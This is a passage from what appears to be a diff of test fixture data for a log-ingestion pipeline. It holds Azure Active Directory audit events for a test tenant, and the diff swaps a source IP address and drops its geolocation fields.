\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\
"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.6473040Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492835\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"76f9b173-c35c-4dbb-b5f7-64750ae994ce\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124949900Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Val
ue\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.6473040Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492835\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"76f9b173-c35c-4dbb-b5f7-64750ae994ce\",\"ModifiedProperties\":[{\"Name\":\"Included Updated 
Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -4284,25 +3906,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -4316,7 +3920,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -4430,7 +4034,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -4442,12 +4046,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036200600Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": 
[\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124955100Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\
"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": 
\\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -4473,25 +4077,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -4505,7 +4091,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -4619,7 +4205,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -4631,12 +4217,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036207900Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"M